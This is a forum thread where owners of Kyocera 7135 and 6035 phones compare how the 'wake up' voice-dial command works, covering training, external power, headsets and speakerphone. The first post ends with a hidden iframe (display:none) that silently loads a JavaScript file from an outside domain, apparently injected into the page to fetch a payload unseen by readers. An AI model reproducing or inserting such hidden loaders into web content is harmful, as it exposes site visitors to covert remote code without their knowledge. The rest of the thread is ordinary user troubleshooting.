+ Reply to Thread
Page 1 of 2 1 2 LastLast

How does "wake up" work?

I've searched the forum and my users book, but can't find much about the "wake up" voice command, other than how to train it. I've been yelling "wake up" at my phone and can't figure out what the command is supposed to do and when??? My co-workers are starting to give me strange looks. Please help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You have to have the phone in the cradle or hooked to a power supply. Then you have to train the commands.

Then you say "wake up" and the phone will beep. Say "wake up" again and the voice will say something like "say the name you want to dial"

(They give me strange looks anyway, regardless).

Administrator
    this is also discussed in the 6035 forum. you can do a search there for "train words" "wake up"...

you do not have to train wake up...you just have to activate it in phone preferences. you then with ear piece connected say wake up twice. you will hear a beep after you say wake up once .. then say wake up again and you are there in your voice dial system..

Originally posted by richard
    You have to have the phone in the cradle or hooked to a power supply. Then you have to train the commands.

Then you say "wake up" and the phone will beep. Say "wake up" again and the voice will say something like "say the name you want to dial"

(They give me strange looks anyway, regardless).
    You need the power supply, cradle or no. If I remember correctly, sitting in the cradle w/o power won't work for the 6035.

Originally posted by teamsimple
    you do not have to train wake up...you just have to activate it in phone preferences. you then with ear piece connected say wake up twice. you will hear a beep after you say wake up once .. then say wake up again and you are there in your voice dial system..
    That's strange, are you sure you don't need to train? How would it know what you sound like, and why would they let you train it, along with "Yes" and "No"?

Originally posted by teamsimple
    you do not have to train wake up...
    --------------------
    Ah... but I think you can if you want to.... In fact I trained my phone ladies voice coach to recognize "humn..."
    instead of "wake up!@#$@#@ dammit!
    Are KWC7135's available in either both gender?

Administrator
    yes you have to train the phone to ID your voice. you can also use any words you like...

So am I to understand that you can not use the voice dialing unless it is connected to the earbud or a hands free car system?
    If at first you don't succeed, don't try sky diving.

Originally posted by Steve B.
    So am I to understand that you can not use the voice dialing unless it is connected to the earbud or a hands free car system?
    No, you just can't wake up the phone with your voice unless it is connected to the earbud or a hands free car system. If you hit the green PHONE button without having pressed any digits first, and you have voice dialing activated, it will ask you to say the name of the person to call. Works in all modes.

Alan

The voice Lady will come out to play with as little as enabling the option, hooked to either a car or fast charger, and phone in speakerphone mode.

Originally posted by alanb
    No, you just can't wake up the phone with your voice unless it is connected to the earbud or a hands free car system. If you hit the green PHONE button without having pressed any digits first, and you have voice dialing activated, it will ask you to say the name of the person to call. Works in all modes.

Alan
    Many thanks Alan. I feel much better.
    If at first you don't succeed, don't try sky diving.

Registered User All-Purpose Guru's Avatar

Not handsfree. Power.

Folks,

Let's be clear here. It's not the earbud, or a handsfree car kit. It's power. The phone can't monitor you constantly (which is needed for it to hear the "wake up" command) unless it's connected to a power supply. You can be sitting in the cradle, in a car kit, or hanging from the dashboard in your car. (my car kit is a stud on the back of the phone and putting the phone in speakerphone mode.) what controls whether or not "wake up" works is whether or not the phone is powered with an external supply, either the wallwart or a car power cord.

If you're not powered, you can always just hit the send button by itself, which works like the wakeup process.

Re: Not handsfree. Power.

Originally posted by All-Purpose Guru
    Folks,

Let's be clear here. It's not the earbud, or a handsfree car kit. It's power. The phone can't monitor you constantly (which is needed for it to hear the "wake up" command) unless it's connected to a power supply. You can be sitting in the cradle, in a car kit, or hanging from the dashboard in your car. (my car kit is a stud on the back of the phone and putting the phone in speakerphone mode.) what controls whether or not "wake up" works is whether or not the phone is powered with an external supply, either the wallwart or a car power cord.

If you're not powered, you can always just hit the send button by itself, which works like the wakeup process.
    I have got to disagree with you. I can not get my phone to wake up unless it is BOTH powered, and has either a headset or I presume the car kit (I didn't buy one) connected. It will not work with external power and just speaker phone enabled.

Also won't work in the charging/synch cradle either with or without the headset. Requires a direct power connection.

Alan

"It will not work with external power and just speaker phone enabled"

maybe cause you trained it with an external mic and it can't hear you thru the phones mic?

Originally posted by aka.bugle
    "It will not work with external power and just speaker phone enabled"

maybe cause you trained it with an external mic and it can't hear you thru the phones mic?
    Nope. Re-train it over the speaker phone and still no go. Only works with external power and a headset.

Alan

crap. It works with just the ac power daptr, and speaker phone on my 6035. It would seem that Kyo wouldn't have removed this feature... But I guess if you had an MP3 playing thru the speaker, it might not differentiate between you and Madonna.

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

VOICE DAIL

We have discussed voice dail before, but here is how it works on the 7135

Set up voice dailing and voice answer in phone prefs.
    Train the phone for wake up, yes and no. You can use what ever u want to say to train those just remember them so u can make it work.
    Phone must have external power
    Must be using earbud, headset or some type of external headset gear.
    Say wake up and get a beep
    Say wake up again and get into the voice dailer.
    Then say the name of the person you want to call.

if you want to use the voice dailer with out the headset or extrenal power you press the green call button 1 time and wait for voice prompt to say a name. It does not WAKE UP without the external power and external headgear/earbud, etc.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

I suppose this differs from the 6035 which doesn't require a headset or earbud. "Wake Up" works just fine on my 6035 while in the cradle (charging w/power) and speakerphone enabled.

Re: Re: Not handsfree. Power.

Originally posted by alanb
    I have got to disagree with you. I can not get my phone to wake up unless it is BOTH powered, and has either a headset or I presume the car kit (I didn't buy one) connected. It will not work with external power and just speaker phone enabled.

Also won't work in the charging/synch cradle either with or without the headset. Requires a direct power connection.

Alan
    One odd little update... This will work in the charging cradle, but only with a headset plugged in AND the flip closed. If the flip is opened, it ignores the wakeup command. weird.

Alan